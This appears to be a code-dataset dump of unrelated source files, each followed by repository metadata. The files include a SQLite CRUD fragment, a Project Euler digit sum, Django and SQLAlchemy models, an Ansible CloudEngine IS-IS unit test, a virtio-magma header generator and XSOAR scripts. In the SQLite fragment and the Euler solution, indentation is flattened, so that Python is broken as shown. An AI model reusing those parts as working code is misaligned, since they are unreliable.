print("Ops! something went wrong during insertion of the data!!")
return 0
return 1
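    # Usage sketch (added note; the argument values below are made up for illustration):
    #   AppOperations.insertData('Alice', '[email protected]', 'T1', 'F-101', 1200,
    #                            'P-07', 500, 'Some Street 5', '9876543210')
    # returns 1 when the row is committed and 0 when the INSERT raises an exception.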
def displayData(): # returns all the data present in the db, list of tuples
data_fetch = cur.execute(''' SELECT * FROM details ''')
list_db = []
for item in data_fetch:
list_db.append(item)
#print(list_db)
return list_db
def countTotalItems():
total_items = 0 # contains the total no. of items present in the table
data_fetch = cur.execute(''' SELECT * FROM details ''')
for item in data_fetch:
total_items = total_items + 1
return total_items
def reset_slno():
data_fetch = cur.execute(''' SELECT * FROM details''')
slno_dum = 0
for item in data_fetch:
first = item[10]
print("first : ",first)
slno_dum = slno_dum + 1
print("sl_no : ",slno_dum)
conn.commit()
def update_values(val_date):
print("date obtained = ",val_date)
rowfetch = cur.execute(''' SELECT * FROM details where timestmp = ?''',(val_date,))
tuple_needed = tuple(rowfetch)[0]
#print("Row fetched! : ", tuple_needed)
return tuple_needed
def updateData(slno,name, e_mail, flat, tower, area, parking, recpt_fees, addr, contact_no,tmestmp):
print("values to be updated : ",slno," ",name," ",e_mail," ", tower, flat, area, parking, recpt_fees, addr, contact_no,tmestmp)
cur.execute(''' UPDATE details SET sl_no = ?, name = ?, e_mail = ?, tower = ?, flat = ?, area = ?, parking = ?,
recpt_fees = ?, addr = ?, contact_no = ? WHERE timestmp = ?''',
(slno,name, e_mail, tower, flat, area, parking, recpt_fees, addr, contact_no,tmestmp))
conn.commit()
| 30.75 | 129 | 0.673103 |
602e2080a574d1c061f3b8f0289691928fdce49a
| 308 |
py
|
Python
|
euler-20.py
|
TFabijo/euler
|
58dc07b9adb236890556ccd5d75ca9dbd2b50df9
|
[
"MIT"
] | null | null | null |
euler-20.py
|
TFabijo/euler
|
58dc07b9adb236890556ccd5d75ca9dbd2b50df9
|
[
"MIT"
] | null | null | null |
euler-20.py
|
TFabijo/euler
|
58dc07b9adb236890556ccd5d75ca9dbd2b50df9
|
[
"MIT"
] | null | null | null |
def fakulteta(n):
zmnozek = 1
for x in range(1,n+1):
zmnozek *= x
return zmnozek
def vsota_stevk_fakultete(n):
fakul = fakulteta(n)
vsota = 0
while fakul > 0:
vsota += fakul % 10
fakul //= 10
return vsota
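# Added note (worked example, not part of the original solution):
# fakulteta(10) == 3628800 and 3+6+2+8+8+0+0 == 27, so vsota_stevk_fakultete(10) == 27.
# The module-level call below computes the result for 100! but discards it;
# wrap it in print(...) to see the answer.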
vsota_stevk_fakultete(100)
| 16.210526 | 30 | 0.542208 |
7164086abb152f9645f762b1d0eba577e01e81fd
| 183 |
py
|
Python
|
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/recordings/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/recordings/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/recordings/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
# Create your models here.
class Recording(models.Model):
name = models.CharField(max_length = 200)
length_ms = models.IntegerField(default = 0)
| 26.142857 | 48 | 0.743169 |
460aca28cb6d411fddd39c6c989a987cee662dcd
| 3,921 |
py
|
Python
|
src/scripts/alchi-wordsum.py
|
milahu/alchi
|
6484d4a877d47204e28cf1a32a5d9da8705aff25
|
[
"CC0-1.0"
] | 3 |
2020-08-12T16:57:23.000Z
|
2021-03-15T18:39:48.000Z
|
src/scripts/alchi-wordsum.py
|
milahu/alchi
|
6484d4a877d47204e28cf1a32a5d9da8705aff25
|
[
"CC0-1.0"
] | 4 |
2020-09-22T19:25:43.000Z
|
2022-02-14T20:51:16.000Z
|
src/scripts/alchi-wordsum.py
|
milahu/alchi
|
6484d4a877d47204e28cf1a32a5d9da8705aff25
|
[
"CC0-1.0"
] | 1 |
2021-04-06T11:18:17.000Z
|
2021-04-06T11:18:17.000Z
|
#!/usr/bin/python3
# https://en.wikipedia.org/wiki/Digital_root
# digital sum
"""
wordlist samples:
https://github.com/hackerb9/gwordlist
All the words from Google Books, sorted by frequency
https://github.com/first20hours/google-10000-english
the 10,000 most common English words in order of frequency
https://github.com/metabase/metabase/raw/master/resources/words-by-frequency.txt
"""
n0 = ord('a') # a = 0
n1 = ord('a') - 1 # a = 1
import sys
from bs4 import UnicodeDammit # pkg: python-beautifulsoup4
#import unicodedata
from unidecode import unidecode # pkg: python-unidecode
def _print(s):
sys.stdout.write(s)
def _toword(s):
res0 = ''
res1 = ''
for c in s:
#try:
if True:
if '0' <= c and c <= '9':
res0 += chr(int(c) + n0)
res1 += chr(int(c) + n1)
#except TypeError:
if False:
c = str(c)
if '0' <= c and c <= '9':
res0 += chr(int(c) + n0)
res1 += chr(int(c) + n1)
return (res0, res1)
def digroot(n):
res = []
while len(str(n)) > 1:
n2 = 0
for c in str(n):
n2 += int(c)
res.append(n2)
n = n2
return res
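# Added note (plain arithmetic, for illustration): digroot(187) collects 1+8+7 = 16,
# then 1+6 = 7, and returns [16, 7]; the last entry is the digital root.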
def wordsum(w):
n = 0
sum0 = []
sum1 = []
#print('w = ' + repr(w))
for c in w:
#print('c = ' + repr(c))
if '0' <= c and c <= '9':
sum0.append(int(c))
sum1.append(int(c))
continue
if 'a' <= c and c <= 'z':
sum0.append(ord(c) - n0)
sum1.append(ord(c) - n1)
continue
if 'A' <= c and c <= 'Z':
sum0.append(ord(c.lower()) - n0)
sum1.append(ord(c.lower()) - n1)
continue
# ignore other signs
#print(n)
drs = []
ns = []
ss = []
for (i, s) in enumerate([sum0, sum1]):
ss.append(s)
n = sum(s)
ns.append(n)
# _print('n%i = ' % i + ' + '.join(map('{:2d}'.format, s)) + ' = ' + str(n))
dr = digroot(n)
if dr:
# _print(' --> ' + ' --> '.join(map(str, dr)))
drs.append(dr)
else:
drs.append([s])
# print() # new line
#for x in drs:
# if x[0] == 187:
# print('s0 = %3i s1 = %3i %s' % (ns[0], ns[1], w))
# only print words with 'digital root seven' in both variants
if drs[0][-1] == 7:
are_same = True
for x in drs[1:]:
if x[-1] != drs[0][-1]:
are_same = False
break
if are_same:
# print('we have a winner')
# print('word = %s' % w)
# print('%-24s s0 = %3i s1 = %3i' % (w, ns[0], ns[1]))
# print('s0 = %3i s1 = %3i %s' % (ns[0], ns[1], w))
# print("%03i° %03i' %s" % (ns[0], ns[1], w))
# print("%03i %03i %s" % (ns[0], ns[1], w))
print("%s %03i %03i" % (w, ns[0], ns[1]))
# for (i, dr) in enumerate(drs):
# _print('n%i = ' % i + ' + '.join(map('{:2d}'.format, ss[i])) + ' = ' + str(ns[i]))
# print(' --> ' + ' --> '.join(map(str, dr)))
import os.path
for w in sys.argv[1:]:
#print('toword: ' + 'a=0: %s a=1: %s' % _toword(w))
#print('word = %s' % w)
wordsum(w)
# process wordlist file
if os.path.isfile(w):
c = None
with open(w, 'rb') as f:
#if False:
# guess encoding
f.seek(10000)
s = f.read(10000)
d = UnicodeDammit(
s,
#f.read(10000),
["latin-1", "iso-8859-1", "cp1252"] # coding hints
)
c = d.original_encoding
print('guess coding '+c)
#f.seek(0)
c = 'utf-8'
with open(w, 'r', encoding=c, errors='ignore') as f:
#with open(w, 'r') as f:
for l in f: # line by line
if w == 'words/gwordlist-frequency-all.txt':
if l[0] == '#':
continue
l = l[11:32] # word
#l = l.decode(c).encode('utf-8')
#print('line = '+l)
#break
# guess input file encoding with beautifulsoup
#l = UnicodeDammit.detwingle(l).decode('utf-8')
l = l.strip()
l = l.replace('ß', 's') # otherwise unidecode will replace 'ß' to 'ss'
l = unidecode(l)
#l = unicodedata.normalize('NFKD', l).encode('ascii', 'ignore').decode('utf-8')
#l = unicodedata.normalize('NFKD', l)
try:
if l[0] in ['-', '#', '!']:
l = l[1:]
if l[-1] in ['-', '#', '!', '0']:
l = l[:-1]
except IndexError:
pass
wordsum(l)
| 21.783333 | 87 | 0.534813 |
e80282abb33e183dd140910cd0a5955cd66b26fc
| 10,762 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_view.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_view.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cloudengine/test_ce_is_is_view.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# (c) 2019 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.cloudengine import ce_is_is_view
from ansible_collections.community.general.tests.unit.modules.network.cloudengine.ce_module import TestCloudEngineModule, load_fixture
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
class TestCloudEngineLacpModule(TestCloudEngineModule):
module = ce_is_is_view
def setUp(self):
super(TestCloudEngineLacpModule, self).setUp()
self.mock_get_config = patch('ansible_collections.community.general.plugins.modules.network.cloudengine.ce_is_is_view.get_nc_config')
self.get_nc_config = self.mock_get_config.start()
self.mock_set_config = patch('ansible_collections.community.general.plugins.modules.network.cloudengine.ce_is_is_view.set_nc_config')
self.set_nc_config = self.mock_set_config.start()
self.set_nc_config.return_value = None
self.before = load_fixture('ce_is_is_view', 'before.txt')
self.after = load_fixture('ce_is_is_view', 'after.txt')
def tearDown(self):
super(TestCloudEngineLacpModule, self).tearDown()
self.mock_set_config.stop()
self.mock_get_config.stop()
def test_ce_is_is_view_absent(self):
self.get_nc_config.side_effect = (self.after, self.before)
config = dict(
instance_id=100,
description='ISIS',
islevel='level_1',
coststyle='narrow',
stdlevel2cost=60,
stdbandwidth=100,
autocostenable=True,
autocostenablecompatible=True,
netentity='netentity',
preference_value=100,
route_policy_name='route',
max_load=32,
ip_address='1.1.1.1',
weight=100,
penetration_direct='level2-level1',
import_routepolicy_name='import',
tag=100,
allow_filter=True,
allow_up_down=True,
enablelevel1tolevel2=True,
defaultmode='always',
mode_routepolicyname='mode',
cost=100,
mode_tag=100,
level_type='level_1',
avoid_learning=True,
protocol='ospf',
processid=100,
cost_type='external',
import_cost=100,
import_tag=100,
import_route_policy='import',
impotr_leveltype='level_1',
inheritcost=True,
permitibgp=True,
export_protocol='ospf',
export_policytype='aclNumOrName',
export_processid=100,
export_ipprefix='export',
export_routepolicyname='export',
import_aclnumorname='acl',
import_routepolicyname='import',
bfd_min_rx=100,
bfd_min_tx=100,
bfd_multiplier_num=10,
state='absent'
)
set_module_args(config)
self.execute_module(changed=True)
def test_ce_is_is_view_present(self):
self.get_nc_config.side_effect = (self.before, self.after)
update = ['isis 100',
'description ISIS',
'is-level level_1',
'cost-style narrow',
'circuit-cost 60 level-2',
'bandwidth-reference 100',
'network-entity netentity',
'preference 100 route-policy route',
'maximum load-balancing 32',
'nexthop 1.1.1.1 weight 100',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'undo import-route isis level-1 into level-2 disable',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'import-route ospf 100 inherit-cost cost-type external cost 100 tag 100 route-policy import level-1',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'bfd all-interfaces enable',
'bfd all-interfaces min-rx-interval 100 min-tx-interval 100 detect-multiplier 10',
'import-route ospf 100 inherit-cost cost-type external cost 100 tag 100 route-policy import level-1',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'filter-policy ip-prefix export route-policy export export ospf 100',
'bfd all-interfaces min-rx-interval 100 min-tx-interval 100 detect-multiplier 10',
'import-route ospf 100 inherit-cost cost-type external cost 100 tag 100 route-policy import level-1',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'filter-policy acl-name acl route-policy importimport',
'filter-policy ip-prefix export route-policy export export ospf 100',
'bfd all-interfaces min-rx-interval 100 min-tx-interval 100 detect-multiplier 10',
'import-route ospf 100 inherit-cost cost-type external cost 100 tag 100 route-policy import level-1',
'default-route-advertise always cost 100 tag 100 level-1 avoid-learning',
'import-route isis level-2 into level-1 filter-policy route-policy import tag 100 direct allow-filter-policy allow-up-down-bit',
'preference 100 route-policy route',
'auto-cost enable',
'auto-cost enable compatible']
config = dict(
instance_id=100,
description='ISIS',
islevel='level_1',
coststyle='narrow',
stdlevel2cost=60,
stdbandwidth=100,
autocostenable=True,
autocostenablecompatible=True,
netentity='netentity',
preference_value=100,
route_policy_name='route',
max_load=32,
ip_address='1.1.1.1',
weight=100,
penetration_direct='level2-level1',
import_routepolicy_name='import',
tag=100,
allow_filter=True,
allow_up_down=True,
enablelevel1tolevel2=True,
defaultmode='always',
mode_routepolicyname='mode',
cost=100,
mode_tag=100,
level_type='level_1',
avoid_learning=True,
protocol='ospf',
processid=100,
cost_type='external',
import_cost=100,
import_tag=100,
import_route_policy='import',
impotr_leveltype='level_1',
inheritcost=True,
permitibgp=True,
export_protocol='ospf',
export_policytype='aclNumOrName',
export_processid=100,
export_ipprefix='export',
export_routepolicyname='export',
import_aclnumorname='acl',
import_routepolicyname='import',
bfd_min_rx=100,
bfd_min_tx=100,
bfd_multiplier_num=10
)
set_module_args(config)
result = self.execute_module(changed=True)
        self.assertEqual(sorted(result['updates']), sorted(update))
def test_ce_is_is_view_no_changed(self):
self.get_nc_config.side_effect = (self.after, self.after)
config = dict(
instance_id=100,
description='ISIS',
islevel='level_1',
coststyle='narrow',
stdlevel2cost=60,
stdbandwidth=100,
autocostenable=True,
autocostenablecompatible=True,
netentity='netentity',
preference_value=100,
route_policy_name='route',
max_load=32,
ip_address='1.1.1.1',
weight=100,
penetration_direct='level2-level1',
import_routepolicy_name='import',
tag=100,
allow_filter=True,
allow_up_down=True,
enablelevel1tolevel2=True,
defaultmode='always',
mode_routepolicyname='mode',
cost=100,
mode_tag=100,
level_type='level_1',
avoid_learning=True,
protocol='ospf',
processid=100,
cost_type='external',
import_cost=100,
import_tag=100,
import_route_policy='import',
impotr_leveltype='level_1',
inheritcost=True,
permitibgp=True,
export_protocol='ospf',
export_policytype='aclNumOrName',
export_processid=100,
export_ipprefix='export',
export_routepolicyname='export',
import_aclnumorname='acl',
import_routepolicyname='import',
bfd_min_rx=100,
bfd_min_tx=100,
bfd_multiplier_num=10
)
set_module_args(config)
self.execute_module(changed=False)
| 43.220884 | 146 | 0.610481 |
e803a1701a74ac959fddab953c76411b42a0f00d
| 8,626 |
py
|
Python
|
garnet/lib/magma/include/virtio/virtio_magma.h.gen.py
|
opensource-assist/fuschia
|
66646c55b3d0b36aae90a4b6706b87f1a6261935
|
[
"BSD-3-Clause"
] | 3 |
2020-08-02T04:46:18.000Z
|
2020-08-07T10:10:53.000Z
|
garnet/lib/magma/include/virtio/virtio_magma.h.gen.py
|
opensource-assist/fuschia
|
66646c55b3d0b36aae90a4b6706b87f1a6261935
|
[
"BSD-3-Clause"
] | null | null | null |
garnet/lib/magma/include/virtio/virtio_magma.h.gen.py
|
opensource-assist/fuschia
|
66646c55b3d0b36aae90a4b6706b87f1a6261935
|
[
"BSD-3-Clause"
] | 1 |
2020-08-07T10:11:49.000Z
|
2020-08-07T10:11:49.000Z
|
#!/usr/bin/env python2.7
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import sys
def usage():
print 'Usage:'
print ' virtio_magma.h.gen.py FORMAT INPUT OUTPUT'
print ' FORMAT either \"fuchsia\" or \"linux\"'
print ' INPUT json file containing the magma interface definition'
print ' OUTPUT destination path for the virtio header file to generate'
print ' Example: ./virtio_magma.h.gen.py fuchsia ../magma_abi/magma.json ./virtio_magma.h'
print ' Generates the virtio magma header based on a provided json definition,'
print ' for either fuchsia or the linux kernel.'
# Generates a c or cpp style comment
def comment(lines, cpp):
ret = ('// ' if cpp else '/* ') + lines[0] + '\n'
for line in lines[1:]:
ret += ('// ' if cpp else ' ') + line + '\n'
if not cpp:
ret = ret[:-1] + ' */\n'
return ret
# Wire formats for various widths
def wire_format_from_width(width):
global fuchsia
global tab
format_fuchsia = {
1: 'uint8_t',
2: 'uint16_t',
4: 'uint32_t',
8: 'uint64_t',
}
format_linux = {
1: 'u8',
2: '__le16',
4: '__le32',
8: '__le64',
}
invalid = 'INVALID TYPE WIDTH'
if fuchsia:
return format_fuchsia.get(width, invalid)
return format_linux.get(width, invalid)
# Wire format for a given type
def wire_format(type):
# Default to 8 bytes
width = 8
if type.find('*') != -1: width = 8
if type == 'uint32_t': width = 4
if type == 'int32_t': width = 4
if type == 'magma_bool_t': width = 1
return wire_format_from_width(width)
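# Added note: with the fuchsia format selected, wire_format('uint32_t') yields 'uint32_t';
# with the linux format it yields '__le32'. Pointer types always fall back to the
# 8-byte wire type, per the width table above.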
# License string for the top of the file.
def license():
global fuchsia
lines = [
'Copyright 2018 The Fuchsia Authors. All rights reserved.',
'Use of this source code is governed by a BSD-style license that can be',
'found in the LICENSE file.'
]
return comment(lines, fuchsia)
# Warning string about auto-generation
def warning():
global fuchsia
lines = [
'NOTE: DO NOT EDIT THIS FILE! It is generated automatically by:',
' //garnet/lib/magma/include/virtio/virtio_magma.h.gen.py'
]
return comment(lines, fuchsia)
# Guard macro that goes at the beginning/end of the header (after license).
def guards(begin):
global fuchsia
global tab
macro = '_LINUX_VIRTIO_MAGMA_H'
if fuchsia:
macro = 'GARNET_LIB_MAGMA_INCLUDE_VIRTIO_VIRTIO_MAGMA_H_'
if begin:
return '#ifndef ' + macro + '\n#define ' + macro + '\n'
return '#endif ' + comment([macro], fuchsia)
# Includes lists.
def includes():
ret = ''
if fuchsia:
ret += '#include <stdint.h>\n'
ret += '#include <zircon/compiler.h>\n'
else:
ret += '#include <linux/virtio_ids.h>\n'
ret += '#include <linux/virtio_config.h>\n'
ret += '#include <linux/virtmagma.h>\n'
return ret
# Extract the non-"magma_" portion of the name of an export
def get_name(export):
return export['name'][len('magma_'):]
# Generate a 4-digit hex string for a given integer, checking against collisions
def format_id(id, used):
ret = '0x{:04X}'.format(id)
    if (id >= len(used) or used[id]):
raise Exception('Command ID collision: ' + ret)
used[id] = True
return ret
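# Added note: for example format_id(0x1001, used) returns '0x1001' and marks slot
# 0x1001 as used, so a second request for the same id raises the collision Exception.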
# Generate enum
def gen_enums(magma):
global fuchsia
global tab
commands = tab + comment(['magma commands'], fuchsia)
responses = tab + comment(['magma success responses'], fuchsia)
errors = tab + comment(['magma error responses'], fuchsia)
string_table = 'inline const char* virtio_magma_ctrl_type_string(enum virtio_magma_ctrl_type type) {\n'
string_table += tab + 'switch (type) {\n'
expected_response_table = 'inline enum virtio_magma_ctrl_type virtio_magma_expected_response_type(enum virtio_magma_ctrl_type type) {\n'
expected_response_table += tab + 'switch (type) {\n'
command_id_base = 0x1000
response_id_base = 0x2000
error_id_base = 0x3000
max_id_count = 0x4000
used = [False] * max_id_count
for export in magma['exports']:
name = get_name(export).upper()
ordinal = export['ordinal']
assert ordinal < magma['next-free-ordinal']
command_id = command_id_base + ordinal
response_id = response_id_base + ordinal
commands += tab + 'VIRTIO_MAGMA_CMD_' + name + ' = ' + format_id(command_id, used) + ',\n'
responses += tab + 'VIRTIO_MAGMA_RESP_' + name + ' = ' + format_id(response_id, used) + ',\n'
command_id = response_id = ''
string_table += tab + tab + 'case VIRTIO_MAGMA_CMD_' + name + ': return "VIRTIO_MAGMA_CMD_' + name + '";\n'
string_table += tab + tab + 'case VIRTIO_MAGMA_RESP_' + name + ': return "VIRTIO_MAGMA_RESP_' + name + '";\n'
expected_response_table += tab + tab + 'case VIRTIO_MAGMA_CMD_' + name + ': return VIRTIO_MAGMA_RESP_' + name + ';\n'
error_names = [
'VIRTIO_MAGMA_RESP_ERR_UNIMPLEMENTED',
'VIRTIO_MAGMA_RESP_ERR_INTERNAL',
'VIRTIO_MAGMA_RESP_ERR_HOST_DISCONNECTED',
'VIRTIO_MAGMA_RESP_ERR_OUT_OF_MEMORY',
'VIRTIO_MAGMA_RESP_ERR_INVALID_COMMAND',
'VIRTIO_MAGMA_RESP_ERR_INVALID_ARGUMENT'
]
error_id = error_id_base + 1
for error_name in error_names:
errors += tab + error_name + ' = ' + format_id(error_id, used) + ',\n'
string_table += tab + tab + 'case ' + error_name + ': return "' + error_name + '";\n'
error_id = error_id + 1
string_table += tab + tab + 'default: return "[invalid virtio_magma_ctrl_type]";\n'
string_table += tab + '}\n'
string_table += '}\n'
expected_response_table += tab + tab + 'default: return VIRTIO_MAGMA_RESP_ERR_INVALID_COMMAND;\n'
expected_response_table += tab + '}\n'
expected_response_table += '}\n'
ret = 'enum virtio_magma_ctrl_type {\n'
ret += commands
ret += responses
ret += errors
if fuchsia:
ret += '} __PACKED;\n\n'
else:
ret += '} __attribute((packed));\n\n'
ret += string_table + '\n'
ret += expected_response_table
return ret
# Format command or response struct for an export
def format_struct(export, ctrl):
global fuchsia
global tab
name = 'virtio_magma_' + get_name(export) + '_' + ('ctrl' if ctrl else 'resp')
ret = ''
if fuchsia:
ret += 'typedef '
ret += 'struct ' + name + ' {\n'
if fuchsia:
ret += tab + 'virtio_magma_ctrl_hdr_t hdr;\n'
else:
ret += tab + 'struct virtio_magma_ctrl_hdr hdr;\n'
for argument in export['arguments']:
# Include this argument iff out and resp or !out and ctrl
use = False
if argument['name'].find('_out') == -1:
if ctrl:
use = True
else:
if not ctrl:
use = True
if use:
ret += tab + wire_format(argument['type']) + ' ' + argument['name'] + ';\n'
# Add return value, if any
if not ctrl:
if export['type'] != 'void':
ret += tab + wire_format(export['type']) + ' result_return;\n'
if fuchsia:
ret += '} __PACKED ' + name + '_t;\n'
else:
ret += '} __attribute((packed));\n'
return ret
def config_type():
global fuchsia
global tab
ret = ''
if fuchsia:
ret += 'typedef '
ret += 'struct virtio_magma_config {\n'
ret += tab + wire_format('uint8_t') + ' dummy;\n'
if fuchsia:
ret += '} __PACKED virtio_magma_config_t;\n'
else:
ret += '} __attribute((packed));\n'
return ret
# Common control header struct
def ctrl_hdr():
global fuchsia
global tab
ret = ''
if fuchsia:
ret += 'typedef '
ret += 'struct virtio_magma_ctrl_hdr {\n'
ret += tab + wire_format('uint32_t') + ' type;\n'
ret += tab + wire_format('uint32_t') + ' flags;\n'
if fuchsia:
ret += '} __PACKED virtio_magma_ctrl_hdr_t;\n'
else:
ret += '} __attribute((packed));\n'
return ret
fuchsia = True
tab = ' '
def main():
global fuchsia
global tab
if (len(sys.argv) != 4):
usage()
exit(-1)
if (sys.argv[1] == 'linux'):
fuchsia = False
tab = '\t'
elif (sys.argv[1] != 'fuchsia'):
usage()
exit(-2)
with open(sys.argv[2], 'r') as file:
with open(sys.argv[3], 'w') as dest:
magma = json.load(file)['magma-interface']
header = license() + '\n'
header += warning() + '\n'
header += guards(True) + '\n'
header += includes() + '\n'
if fuchsia:
header += '__BEGIN_CDECLS\n\n'
header += config_type() + '\n'
header += gen_enums(magma) + '\n'
header += ctrl_hdr() + '\n'
for export in magma['exports']:
header += format_struct(export, True) + '\n'
header += format_struct(export, False) + '\n'
if fuchsia:
header += '__END_CDECLS\n\n'
header += guards(False)
dest.write(header)
if __name__ == '__main__':
sys.exit(main())
| 31.713235 | 138 | 0.643751 |
1c977454d64119f3c5ea9748743df7399c05fc55
| 790 |
py
|
Python
|
Packs/DynamicSectionReports/Scripts/DisplayTaggedWarroomEntries/DisplayTaggedWarroomEntries.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/DynamicSectionReports/Scripts/DisplayTaggedWarroomEntries/DisplayTaggedWarroomEntries.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/DynamicSectionReports/Scripts/DisplayTaggedWarroomEntries/DisplayTaggedWarroomEntries.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
import json
filter_arg = json.loads(demisto.args().get("filter", json.dumps({"tags": ["report"]})))
raw_entries = None
if filter_arg:
raw_entries = demisto.executeCommand('getEntries', {"id": demisto.incident().get("id"), "filter": filter_arg})
if raw_entries:
entries = []
for entry in raw_entries:
entries.append(str(entry["Contents"]))
else:
entries = ["No entries tagged with 'report' tag"]
# demisto.results(str(entries))
result = {
'Type': entryTypes["note"],
'Contents': "\n".join(entries),
'ContentsFormat': formats['markdown'],
'HumanReadable': "\n".join(entries),
'ReadableContentsFormat': formats['markdown']
}
demisto.results(result)
| 24.6875 | 114 | 0.674684 |
98eb4253442de3e6966845ff86d489085844b0fa
| 1,613 |
py
|
Python
|
common/models/member/MemberAddress.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | 2 |
2019-06-10T08:57:47.000Z
|
2021-06-12T16:22:15.000Z
|
common/models/member/MemberAddress.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
common/models/member/MemberAddress.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from sqlalchemy import Column, DateTime, Index, Integer, String
from sqlalchemy.schema import FetchedValue
from application import db
class MemberAddress(db.Model):
__tablename__ = 'member_address'
__table_args__ = (
db.Index('idx_member_id_status', 'member_id', 'status'),
)
id = db.Column(db.Integer, primary_key=True)
member_id = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
nickname = db.Column(db.String(20), nullable=False, server_default=db.FetchedValue())
mobile = db.Column(db.String(11), nullable=False, server_default=db.FetchedValue())
province_id = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
province_str = db.Column(db.String(50), nullable=False, server_default=db.FetchedValue())
city_id = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
city_str = db.Column(db.String(50), nullable=False, server_default=db.FetchedValue())
area_id = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
area_str = db.Column(db.String(50), nullable=False, server_default=db.FetchedValue())
address = db.Column(db.String(100), nullable=False, server_default=db.FetchedValue())
status = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
is_default = db.Column(db.Integer, nullable=False, server_default=db.FetchedValue())
updated_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
created_time = db.Column(db.DateTime, nullable=False, server_default=db.FetchedValue())
| 59.740741 | 93 | 0.749535 |
c734ebd6178f9f1c535610ca3b18a21d57d45c9a
| 1,675 |
py
|
Python
|
Packs/SlashNextPhishingIncidentResponse/Scripts/BrandImpersonationDetection/BrandImpersonationDetection.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/SlashNextPhishingIncidentResponse/Scripts/BrandImpersonationDetection/BrandImpersonationDetection.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/SlashNextPhishingIncidentResponse/Scripts/BrandImpersonationDetection/BrandImpersonationDetection.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import re
import demistomock as demisto
from CommonServerPython import * # noqa: F401
# Scipt result
res = False
# Mandatory arguments
file_entry_ids = demisto.args()["ForensicFileEntry"]
forensic_files = file_entry_ids if isinstance(file_entry_ids, list) else file_entry_ids.split(",")
